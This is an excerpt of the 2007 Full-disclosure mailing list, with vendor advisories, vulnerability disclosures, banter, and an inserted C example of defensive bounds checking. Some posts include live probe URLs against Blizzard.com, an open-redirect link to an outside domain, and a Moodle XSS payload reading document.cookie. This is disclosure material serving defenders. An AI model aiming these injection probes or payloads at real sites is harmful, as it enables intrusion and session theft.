References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <4ef5fec60707021126h652b6ec9r75df020c66b0b481@mail.gmail.com>
Message-ID: <28f529ba0707021134s7c9898c5i5e6063138fb48426@mail.gmail.com>

ya but has anyone seen it exploited in the wild, outside of perhaps defcon/blackhat/conferences, etc? I think I have a greater threat of spilling a soda on my laptop.

On 7/2/07, coderman wrote:
> On 7/2/07, Joshua Ogle wrote:
> > ... I've now found a live CD which will help get
> > into a Linux environment to do the work.
>
> speaking of which, when is backtrack going to get an updated aircrack-ng?
> :)
> ... beware airodump-ng till then.

From mike.vasquez at gmail.com Mon Jul 2 19:38:22 2007
From: mike.vasquez at gmail.com (Mike Vasquez)
Date: Mon, 2 Jul 2007 11:38:22 -0700
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com>
Message-ID: <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com>

I think it was more as a statement regarding the maturity of security tools on each platform. for instance, for wireless, linux has far more tools, and a wider variety, for that work, than windows, and the tools have fewer limitations... and that's an opinion from an mcse+i/mcdba/mcse:security.

so more often than not, for research/security work: linux good/windows bad. not as a statement regarding which platform is better in general, or more secure, etc. just simply from the vantage point of needing to do security work.

On 7/2/07, Stack Smasher wrote:
> You have to understand the laptop and OS are just tools to obtain whatever
> information you need. Linux and Window$ are just a way of running
> applications to help you achieve your goal. Don't think of Linux as "Good"
> and "Windows" as bad as far as security is concerned. It's the mis-configured
> system and network in general that make it insecure. Not only that, windows
> keeps us security guys employed ; )
> ...
From falco at gentoo.org Mon Jul 2 22:16:54 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Mon, 2 Jul 2007 23:16:54 +0200
Subject: [Full-disclosure] [ GLSA 200707-02 ] OpenOffice.org: Two buffer overflows
Message-ID: <20070702211654.GB2021@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200707-02
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: OpenOffice.org: Two buffer overflows
      Date: July 02, 2007
      Bugs: #181773
        ID: 200707-02

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities have been discovered in OpenOffice.org, allowing for the remote execution of arbitrary code.

Background
==========

OpenOffice.org is an open source office productivity suite, including word processing, spreadsheet, presentation, drawing, data charting, formula editing, and file conversion facilities.

Affected packages
=================

    -------------------------------------------------------------------
     Package                        /  Vulnerable  /           Unaffected
    -------------------------------------------------------------------
  1  app-office/openoffice                < 2.2.1                >= 2.2.1
  2  app-office/openoffice-bin            < 2.2.1                >= 2.2.1
    -------------------------------------------------------------------
     2 affected packages on all of their supported architectures.
    -------------------------------------------------------------------

Description
===========

John Heasman of NGSSoftware has discovered a heap-based buffer overflow when parsing the "prdata" tag in RTF files where the first token is smaller than the second one (CVE-2007-0245). Additionally, the OpenOffice binary program is shipped with a version of FreeType that contains an integer signedness error in the n_points variable in file truetype/ttgload.c, which was covered by GLSA 200705-22 (CVE-2007-2754).

Impact
======

A remote attacker could entice a user to open a specially crafted document, possibly leading to execution of arbitrary code with the rights of the user running OpenOffice.org.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All OpenOffice.org users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/openoffice-2.2.1"

All OpenOffice.org binary users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=app-office/openoffice-bin-2.2.1"

References
==========

  [ 1 ] CVE-2007-0245
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0245
  [ 2 ] CVE-2007-2754
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2754
  [ 3 ] GLSA 200705-22
        http://www.gentoo.org/security/en/glsa/glsa-200705-22.xml

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200707-02.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5

From falco at gentoo.org Mon Jul 2 22:30:11 2007
From: falco at gentoo.org (Raphael Marichez)
Date: Mon, 2 Jul 2007 23:30:11 +0200
Subject: [Full-disclosure] [ GLSA 200707-03 ] Evolution: User-assisted remote execution of arbitrary code
Message-ID: <20070702213011.GD2021@falco.falcal.net>

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                    Gentoo Linux Security Advisory           GLSA 200707-03
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Evolution: User-assisted remote execution of arbitrary code
      Date: July 02, 2007
      Bugs: #182011
        ID: 200707-03

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

The IMAP client of Evolution contains a vulnerability potentially leading to the execution of arbitrary code.

Background
==========

Evolution is the mail client of the GNOME desktop environment. Camel is the Evolution Data Server module that handles mail functions.

Affected packages
=================

    -------------------------------------------------------------------
     Package                              /  Vulnerable  /   Unaffected
    -------------------------------------------------------------------
  1  gnome-extra/evolution-data-server       < 1.8.3-r5     >= 1.8.3-r5
                                                           *>= 1.6.2-r1
    -------------------------------------------------------------------

Description
===========

The imap_rescan() function of the file camel-imap-folder.c does not properly sanitize the "SEQUENCE" response sent by an IMAP server before it is used to index arrays.

Impact
======

A malicious or compromised IMAP server could trigger the vulnerability and execute arbitrary code with the permissions of the user running Evolution.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Evolution users should upgrade evolution-data-server to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose "gnome-extra/evolution-data-server"

References
==========

  [ 1 ] CVE-2007-3257
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-3257

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200707-03.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2007 Gentoo Foundation, Inc; referenced text belongs to its owner(s).

The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
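The two Gentoo advisories above share a root cause worth seeing in code: an integer taken from untrusted input (the two length tokens of the RTF "prdata" tag in GLSA 200707-02, the server-supplied sequence number handled by imap_rescan() in GLSA 200707-03) is used to size or index a buffer without first being checked against what the program already knows. The C program below is an added example written for this page, not code from OpenOffice.org, FreeType, Evolution or Gentoo. The record layouts it parses (a "\prdata <declared> <count> <hex bytes>" record and an "* <n> FETCH" line), the SUMMARY array and all function names are simplified stand-ins chosen for the example, not the real formats or the real code paths. What it shows is where the check belongs in each parser: the copy count may never exceed the allocation, and a 1-based sequence number must fall inside the folder summary before it becomes an array index.

```c
/* Added example for this page (not OpenOffice.org, FreeType, Evolution or
 * Gentoo code). Both record layouts are simplified stand-ins for the real RTF
 * and IMAP formats; the point is where the consistency checks sit. */
#include <errno.h>
#include <stdlib.h>
#include <string.h>

/* Parse one unsigned decimal token at *p (leading spaces allowed) and advance
 * *p past it. Rejects signs, junk and values that overflow unsigned long. */
static int parse_uint(const char **p, size_t *out)
{
    const char *s = *p;
    char *end;
    unsigned long v;
    while (*s == ' ') s++;
    if (*s < '0' || *s > '9') return -1;   /* strtoul alone would accept "-1" */
    errno = 0;
    v = strtoul(s, &end, 10);
    if (errno == ERANGE) return -1;
    *p = end;
    *out = (size_t)v;
    return 0;
}

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Part 1: RTF-style record "\prdata <declared> <count> <hex bytes...>".
 * A parser that trusts both tokens does malloc(declared) and then copies
 * `count` bytes: the "first token smaller than the second" overflow of
 * CVE-2007-0245. Here the relation is checked before anything is allocated. */
enum { PRDATA_OK = 0, PRDATA_BAD_SYNTAX = -1, PRDATA_LEN_MISMATCH = -2 };

int prdata_parse(const char *rec, unsigned char **out, size_t *outlen)
{
    const char *p = rec;
    size_t declared, count, i;
    unsigned char *buf;
    if (strncmp(p, "\\prdata", 7) != 0) return PRDATA_BAD_SYNTAX;
    p += 7;
    if (parse_uint(&p, &declared) || parse_uint(&p, &count)) return PRDATA_BAD_SYNTAX;
    if (count > declared) return PRDATA_LEN_MISMATCH;      /* the missing check */
    buf = malloc(declared ? declared : 1);
    if (!buf) return PRDATA_BAD_SYNTAX;
    for (i = 0; i < count; i++) {                  /* i < count <= declared */
        int hi, lo;
        while (*p == ' ') p++;
        hi = hexval((unsigned char)p[0]);
        lo = hi < 0 ? -1 : hexval((unsigned char)p[1]);  /* never read past NUL */
        if (hi < 0 || lo < 0) { free(buf); return PRDATA_BAD_SYNTAX; }
        buf[i] = (unsigned char)(hi << 4 | lo);
        p += 2;
    }
    *out = buf;
    *outlen = count;
    return PRDATA_OK;
}

/* Wrappers returning just a status, or one decoded byte (-1 on any error). */
int prdata_status(const char *rec)
{
    unsigned char *b; size_t n;
    int rc = prdata_parse(rec, &b, &n);
    if (rc == PRDATA_OK) free(b);
    return rc;
}

int prdata_byte(const char *rec, size_t i)
{
    unsigned char *b; size_t n; int v = -1;
    if (prdata_parse(rec, &b, &n) == PRDATA_OK) { if (i < n) v = b[i]; free(b); }
    return v;
}

/* Part 2: IMAP "* <seq> FETCH ..." line. The server chooses <seq>, and it is
 * 1-based, so only 1..summary_count may become a 0-based array index. */
int imap_sequence_to_index(const char *resp, size_t summary_count, size_t *idx)
{
    const char *p = resp;
    size_t seq;
    if (strncmp(p, "* ", 2) != 0) return -1;
    p += 2;
    if (parse_uint(&p, &seq)) return -1;
    if (seq == 0 || seq > summary_count) return -1;   /* the missing bounds check */
    *idx = seq - 1;
    return 0;
}

/* Constructed folder summary standing in for the per-message array; returns
 * the entry a FETCH line refers to, or NULL when the index is unusable. */
static const char *const SUMMARY[] = { "hello", "invoice", "meeting" };

const char *imap_subject_for(const char *resp)
{
    size_t idx, n = sizeof SUMMARY / sizeof SUMMARY[0];
    return imap_sequence_to_index(resp, n, &idx) ? NULL : SUMMARY[idx];
}
```

Both parsers reject the bad input before touching memory rather than after: prdata_parse compares the two tokens before malloc(), and imap_sequence_to_index refuses 0, anything past the end of the summary, negative numbers and values that do not fit in an unsigned long before the subtraction that produces the index. The hex loop also stops at the string terminator instead of reading past it, so a record whose payload is shorter than its count is a syntax error, not an over-read.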
From kefka at kevinbeardsucks.com Mon Jul 2 22:47:33 2007
From: kefka at kevinbeardsucks.com (kefka)
Date: Mon, 02 Jul 2007 17:47:33 -0400
Subject: [Full-disclosure] Best wireless card for packet capturing?
In-Reply-To: <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com>
References: <2865.128.253.242.209.1183396243.squirrel@webmail.cornell.edu> <591fd0b20707021105u309fb99fq210773adcc8f28e8@mail.gmail.com> <3230.128.253.242.209.1183400007.squirrel@webmail.cornell.edu> <591fd0b20707021132v241b2e67sfabbc553c862d9ee@mail.gmail.com> <28f529ba0707021138v6410098brf850d1bb9825d138@mail.gmail.com>
Message-ID: <46897275.7080905@kevinbeardsucks.com>

It's the same joke at work, most of us do not like Microsoft security but it keeps us employed (despite their efforts to taint the industry).

-----------------------

Mike Vasquez wrote:
> I think it was more as a statement regarding the maturity of security
> tools on each platform. for instance, for wireless, linux has far
> more tools, and a wider variety, for that work, than windows, and the
> tools have fewer limitations... and that's an opinion from an
> mcse+i/mcdba/mcse:security.
>
> so more often than not, for research/security work: linux good/windows
> bad. not as a statement regarding which platform is better in
> general, or more secure, etc. just simply from the vantage point of
> needing to do security work.
>
> On 7/2/07, *Stack Smasher* wrote:
>
>     You have to understand the laptop and OS are just tools to obtain
>     whatever information you need.
>     ...

From kefka at kevinbeardsucks.com Mon Jul 2 23:01:03 2007
From: kefka at kevinbeardsucks.com (kefka)
Date: Mon, 02 Jul 2007 18:01:03 -0400
Subject: [Full-disclosure] Blizzard.com - Information disclosure.
Message-ID: <4689759F.30103@kevinbeardsucks.com>

Blizzard.com fails to properly sanitize user-supplied input resulting in information disclosure:

http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027&Set=%00

Note the fact that their webroot is on the C: partition.

"C:\web\blizzard.com\wow\ssotd\screenshot.aspx"

*Version Information:* Microsoft .NET Framework Version:1.1.4322.2032; ASP.NET Version:1.1.4322.2032 <-- lol (outdated/missing a hotfix or two)

http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027'&Set=0 <--- probably vulnerable to SQL injection but I don't want to try it.

http://www.blizzard.com/wow/ssotd/screenshot.aspx?imageindex=1027&Set=0 <--- should receive this image, not the first image...meaning something is happening to the query

From kefka at kevinbeardsucks.com Mon Jul 2 23:12:13 2007
From: kefka at kevinbeardsucks.com (kefka)
Date: Mon, 02 Jul 2007 18:12:13 -0400
Subject: [Full-disclosure] Worldofwarcraft.com - Redirection
Message-ID: <4689783D.5020808@kevinbeardsucks.com>

https://www.worldofwarcraft.com/login/login?service=http://kefkahacks.net/

User will be redirected once they login.

From simon at snosoft.com Tue Jul 3 00:20:05 2007
From: simon at snosoft.com (Simon Smith)
Date: Mon, 02 Jul 2007 19:20:05 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked
In-Reply-To: <4689783D.5020808@kevinbeardsucks.com>
Message-ID:

So they interview a non-technical, non-email using person about a hack on the pentagon?

*scratches head*

------------------------------------
SNOsoft Research Team
http://snosoft.blogspot.com

From simon at snosoft.com Tue Jul 3 00:22:31 2007
From: simon at snosoft.com (Simon Smith)
Date: Mon, 02 Jul 2007 19:22:31 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To:
Message-ID:

Oh... And the URL would be helpful. :P

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9025442&source=NLT_VVR&nlid=37

On 7/2/07 7:20 PM, "Simon Smith" wrote:
> So they interview a non-technical, non-email using person about a hack on
> the pentagon?
>
> *scratches head*
> ...
From suckure at gmail.com Tue Jul 3 03:12:56 2007
From: suckure at gmail.com (secure poon)
Date: Mon, 2 Jul 2007 19:12:56 -0700
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To:
References:
Message-ID: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com>

old news..

On 7/2/07, Simon Smith wrote:
> Oh... And the URL would be helpful. :P
>
> http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9025442&source=NLT_VVR&nlid=37
> ...

From simon at snosoft.com Tue Jul 3 04:06:32 2007
From: simon at snosoft.com (Simon Smith)
Date: Mon, 02 Jul 2007 23:06:32 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com>
Message-ID:

Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome?

On 7/2/07 10:12 PM, "secure poon" wrote:
> old news..
> ...

From yahoo at jimpop.com Tue Jul 3 04:33:02 2007
From: yahoo at jimpop.com (Jim Popovitch)
Date: Mon, 02 Jul 2007 23:33:02 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To:
References:
Message-ID: <1183433582.2817.3.camel@localhost>

On Mon, 2007-07-02 at 23:06 -0400, Simon Smith wrote:
> Old... As in you have no concept of time because it just came out? Or
> old.. As in you knew about this before anyone else because you are
> awesome?

Old as in this happened yesterday, last week, last month, last year, last decade, last millennium, etc. The US DoD gets hit all the time... not because they are so much insecure, but because they are such a primary target. It's a fact of life, just like doctors and nurses are the most vulnerable to contract a disease. There are precautions, and they are taken, but the odds are greater.

Now, back to your normal programming....

-Jim P.

From sragan at indy.rr.com Tue Jul 3 04:31:40 2007
From: sragan at indy.rr.com (Steve Ragan)
Date: Mon, 2 Jul 2007 23:31:40 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To:
References: <61f54f4f0707021912k2a124f35q8bce8dd6b28f4933@mail.gmail.com>
Message-ID: <13cc01c7bd22$b0a1cd00$6601a8c0@computer88a6b8>

Simon,

That happened back in June; even the article is dated June 21. It is funny, however, that the person quoted in the transcripts of the press conference said he doesn't use email.

Steve

_____

From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk] On Behalf Of Simon Smith
Sent: Monday, July 02, 2007 11:07 PM
To: secure poon; full-disclosure at lists.grok.org.uk
Subject: Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome?

...

From simon.cooper at gmail.com Tue Jul 3 06:24:24 2007
From: simon.cooper at gmail.com (Simon Cooper)
Date: Mon, 2 Jul 2007 22:24:24 -0700
Subject: [Full-disclosure] iPhone Security Settings
In-Reply-To: <468825BA.1050500@infosecurity.ch>
References: <44AD1215-E473-4148-A95F-CA6ED12572AE@gmail.com> <468825BA.1050500@infosecurity.ch>
Message-ID:

On 7/1/07, Fabio Pietrosanti (naif) wrote:

... text zapped...

> * What's bom? /System/Library/PrivateFrameworks/Bom.framework/Bom

On any Mac OS X system, type "man lsbom" or "man 5 bom" for details. bom = bill of materials. "The Mac OS X Installer uses a file system "bill of materials" to determine which files to install, remove, or upgrade."

> * The security of the boot system plenty of digital signatures to
> prevent firmware hacking?
>
> -naif

--
Simon Cooper

From darkz.gsa at gmail.com Tue Jul 3 08:53:15 2007
From: darkz.gsa at gmail.com (Attila Gerendi)
Date: Tue, 3 Jul 2007 10:53:15 +0300
Subject: [Full-disclosure] eTicket v.1.5.1.1 Multiple Cross-Site Scripting
Message-ID:

eTicket v.1.5.1.1 Multiple Cross-Site Scripting

Author: Attila Gerendi (Darkz)
Date: June 29, 2007
Package: eTicket (http://eticket.sourceforge.net/)
Versions Affected: v.1.5.1.1 (Other versions may also be affected)
Severity: XSS

Input passed to "$_SERVER['REQUEST_URI']" in various scripts and includes is not properly sanitised before being used. This can be exploited to insert arbitrary HTML and script code, which is executed in a user's browser session in the context of an affected site when malicious data is viewed.

Vulnerable code pieces:

user_login.php on line 7:
admin_login.php on line 7: ""
user_group.php on line 15:
rep.php on line 15:
pref.php on line 15:
my.php on line 15:
main.php on line 216:
mail.php on line 16:
cat.php on line 16:
banlist_delete.php on line 13:
banlist_delete.php on line 43:
banlist_addedit.php on line 27:
banlist_addedit.php on line 40:
banlist.php on line 41:

search_form.php:

<?php
$surl=$_SERVER['PHP_SELF'].'?s='.$news;
$qs=preg_replace('/s=(basic|advanced)/', '', $_SERVER['QUERY_STRING']);
if ($qs != '') {
    $surl.=(substr($qs, 0, 1) == '&')?$qs:"&$qs";
}
?>

Status:

1. Contacted the author on June 29, 2007 via the sourceforge tracker ( https://sourceforge.net/tracker/?func=detail&atid=725721&aid=1745220&group_id=132967 ).
2. The author concluded "I am not happy that this is a real bug, and therefore will be closed until further notice."
3. After more work, on July 02, 2007 the svn version was fixed.

Solution:
- edit the source code to ensure the input is properly sanitized.

From darkz.gsa at gmail.com Tue Jul 3 08:56:55 2007
From: darkz.gsa at gmail.com (Attila Gerendi)
Date: Tue, 3 Jul 2007 10:56:55 +0300
Subject: [Full-disclosure] POWER PHLOGGER v.2.2.5 (username) SQL Injection
Message-ID:

POWER PHLOGGER v.2.2.5 (username) SQL Injection

Author: Attila Gerendi (Darkz)
Date: June 25, 2007
Package: POWER PHLOGGER (http://www.phpee.com/)
Versions Affected: v.2.2.5 (Other versions may also be affected)
Severity: SQL Injection

Description:

Input passed to the "username" parameter in "login.php" isn't properly sanitised before being used in a SQL query. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and bypass the login sequence.
This SQL injection is "blind", so the user cannot produce variations in the server input; however, using BENCHMARK it can still be used to retrieve sensitive data from the database and/or heavily load the server and produce a DDOS attack.

The vulnerable code piece is in "/include/get_userdata.php":

/* assign the user's values */
$sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
$res = mysql_query($sql);

The vulnerable parameter at this point is $id, and it is set through the session variable $username from login.php without any sanitisation.

Status:

The product web page says: "Active development of PowerPhlogger has been stopped as of August 2006. The announced successor Phlogger3 will not be released. Also, I am not able to provide you with support for any previous version.", so any user using this version should correct the bug herself.

Solution:

modify

/* assign the user's values */
$sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
$res = mysql_query($sql);

to

/* assign the user's values */
$id = mysql_escape_string($id);
$sql = "SELECT * FROM ".PPHL_TBL_USERS." WHERE id='$id' OR username='$id'";
$res = mysql_query($sql);

From nisr at ngssoftware.com Mon Jul 2 20:06:44 2007
From: nisr at ngssoftware.com (NGSSoftware Insight Security Research)
Date: Mon, 2 Jul 2007 20:06:44 +0100
Subject: [Full-disclosure] High Risk Flaw in Sun's Java Web Start
Message-ID: <022901c7bcdc$221d6fd0$4101a8c0@databasesecurity.com>

John Heasman of NGSSoftware has discovered a high risk vulnerability in Sun Microsystem's Java Web Start that ships with the JRE and JDK on Windows platforms.
The vulnerability affects the following versions of Java Web Start:

Java Web Start in JDK and JRE 5.0 Update 11 and earlier
Java Web Start in SDK and JRE 1.4.2_13 and earlier

This vulnerability permits an untrusted Java Web Start application to overwrite any file that can be accessed under the application user context. This ultimately enables an untrusted application to break out of the sandbox by modifying the user's Java security policy. An untrusted application could be launched via a malicious web page.

Details
*******

The JNLP API defines a set of services that bypass the security sandbox to enable some common client operations. The BasicService is used to discover the application's codebase. Then, the PersistenceService caches content on the local hard drive, keyed to a URL that is relative to the application's base. The name/value pairs provided by the PersistenceService are similar to browser cookies. The Java Web Start implementation honours this legacy by naming the pairs "muffins". Arbitrary files can be written to due to a directory traversal flaw in the PersistenceService.

Solution
********

This issue has now been resolved; further details are available at:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102957-1

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
+44(0)208 401 0070

--
E-MAIL DISCLAIMER

The information contained in this email and any subsequent correspondence is private, is solely for the intended recipient(s) and may contain confidential or privileged information. For those other than the intended recipient(s), any disclosure, copying, distribution, or any other action taken, or omitted to be taken, in reliance on such information is prohibited and may be unlawful. If you are not the intended recipient and have received this message in error, please inform the sender and delete this mail and any attachments. The views expressed in this email do not necessarily reflect NGS policy.
NGS accepts no liability or responsibility for any onward transmission or use of emails and attachments having left the NGS domain. NGS and NGSSoftware are trading names of Next Generation Security Software Ltd. Registered office address: 52 Throwley Way, Sutton, SM1 4BF with Company Number 04225835 and VAT Number 783096402

From Robert.Clark at cern.ch Tue Jul 3 08:22:55 2007
From: Robert.Clark at cern.ch (Robert Clark)
Date: Tue, 03 Jul 2007 09:22:55 +0200
Subject: [Full-disclosure] [Dailydave] iPhone Roadblock
In-Reply-To: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com>
References: <42210a440706301828u10a5d8eer688a381b96f604f5@mail.gmail.com>
Message-ID: <4689F94F.8010800@cern.ch>

matthew wollenweber wrote:
> I'm one of the lucky (or possibly crazy) people that managed to get an
> iPhone yesterday. If you're curious, I'm very happy with it so far. I'm not
> an Apple nut that buys all things Apple, but after years of "smartphones"
> that never seemed quite right, the iPhone really seems to have hit the
> mark.
> My biggest worry was that it used Edge rather than 3G. While at some points
> this is noticeable, the caching and windowing mechanisms really make up for
> the difference. On the whole it's the best smartphone experience I've had.
> But you can read all the reviews in a more appropriate forum...
>
> I'm really interested in hacking up my iPhone. Anything with a *nix OS
> underneath is just too tempting to leave alone. Unfortunately Apple threw a
> curve ball that's outside my skill set. The iPhone doesn't mount as a
> harddrive. I couldn't find any options in iTunes and in linux I only got:
>
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: new full speed USB device using
> ehci_hcd and address 15
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Product: iPhone
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: Manufacturer: Apple Inc.
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: SerialNumber: XYZ123456789
> Jun 30 21:25:42 lothlorien kernel: usb 1-4: configuration #1 chosen from 3
> choices
>
> USB device drivers aren't my thing. Anyone have any suggestions on how to
> get the thing mounted or to go about figuring out how to do so?
>
> Thanks for any help.
>

It's incredibly unlikely that you will be able to mount the underlying OS filesystem in any way or form. I expect (as is often the case) the most viable way to hack the iPhone will be using its official firmware upgrading system and a hacked firmware which poses as an official one. Without doubt, we are in for some interesting discoveries.

--
/**
 * Robert Clark
 **
 * Technical Student ALICE/DAQ
 * Software Engineer CERN PH/AID
 */

From 3APA3A at SECURITY.NNOV.RU Tue Jul 3 10:10:27 2007
From: 3APA3A at SECURITY.NNOV.RU (3APA3A)
Date: Tue, 3 Jul 2007 13:10:27 +0400
Subject: [Full-disclosure] Moodle XSS / Liesbeth base CMS sensitive information disclosure
Message-ID: <9010110361.20070703131027@SECURITY.NNOV.RU>

Dear bugtraq at securityfocus.com,

1. MustLive (mustlive at websecurity.com dot ua) reported a cross-site scripting vulnerability in Moodle 1.7.1 via the search parameter of index.php, example:

http://host/user/index.php?contextid=4&roleid=0&id=2&group=&perpage=20&search=%22style=xss:expression(alert(document.cookie))%20

Detailed information (in Ukrainian)
http://websecurity.com.ua/1045/

Original message (in Russian)
http://securityvulns.ru/Rdocument391.html

2. Durito [damagelab] (durito at mail dot ru) reported an information leak in Liesbeth base CMS (Vendor: www.doubleflex.com), example:

http://host/config.inc

The file is accessible through the Web and contains sensitive information, including the database account.

Original message (in Russian)
http://securityvulns.ru/Rdocument392.html

--
http://securityvulns.com/
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+  \
|  ZARAZA  U  3APA3A   }   You know my name - look up my number (The Beatles)
+-------------o66o--+    /
   |/

From nick at virus-l.demon.co.uk Tue Jul 3 11:28:32 2007
From: nick at virus-l.demon.co.uk (Nick FitzGerald)
Date: Tue, 03 Jul 2007 22:28:32 +1200
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To: <1183433582.2817.3.camel@localhost>
References: <1183433582.2817.3.camel@localhost>
Message-ID: <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk>

Jim Popovitch wrote:
> The US DoD gets hit all the time... not because they are so much
> insecure, but because they are such a primary target. It's a fact of
> life, just like doctors and nurses are the most vulnerable to contract a
> disease. There are precautions, and they are taken, but the odds are
> greater.

_AND_ at least they noticed and moved to act against it.

Every day, many hundreds of thousands of _successful_ attacks against corporations, small businesses and private individuals not only go unreported by them, but entirely undetected and largely unnoticed by the _attacked_.

The reason for this comment? A great many of those mocking the DHS over this incident are part of the group just mentioned and are too stupid to ever realize it...

Regards,

Nick FitzGerald

From nisr at ngssoftware.com Tue Jul 3 11:20:34 2007
From: nisr at ngssoftware.com (NGSSoftware Insight Security Research)
Date: Tue, 3 Jul 2007 11:20:34 +0100
Subject: [Full-disclosure] Buffer overflow in HP Instant Support Driver Check (SDD) ActiveX control
Message-ID: <027201c7bd5b$cc411780$4101a8c0@databasesecurity.com>

John Heasman of NGSSoftware has discovered a high risk vulnerability in the HP Instant Support Driver Check (SDD) ActiveX control, which is marked safe for scripting.
The vulnerability affects the following versions of the SDD control:

HP Instant Support Driver Check versions prior to 1.5.0.3

This vulnerability could be exploited on a malicious web page in order to execute arbitrary code under the user context of the browser.

Details
*******

The queryHub([IN] BSTR bstrValue) method contains a stack based buffer overflow.

Solution
********

This issue has now been resolved in version 1.5.0.3. Further details are available at:
http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01077597

NGSSoftware Insight Security Research
http://www.ngssoftware.com
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070

From sil at infiltrated.net Tue Jul 3 13:21:42 2007
From: sil at infiltrated.net (J. Oquendo)
Date: Tue, 03 Jul 2007 08:21:42 -0400
Subject: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
In-Reply-To: <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk>
References: <1183433582.2817.3.camel@localhost> <468ACD90.5482.6380D050@nick.virus-l.demon.co.uk>
Message-ID: <468A3F56.8040106@infiltrated.net>

Nick FitzGerald wrote:
>
> _AND_ at least they noticed and moved to act against it.
>
> Every day, many hundreds of thousands of _successful_ attacks against
> corporations, small businesses and private individuals not only go
> unreported by them, but entirely undetected and largely unnoticed by
> the _attacked_.
>
> The reason for this comment? A great many of those mocking the DHS
> over this incident are part of the group just mentioned and are too
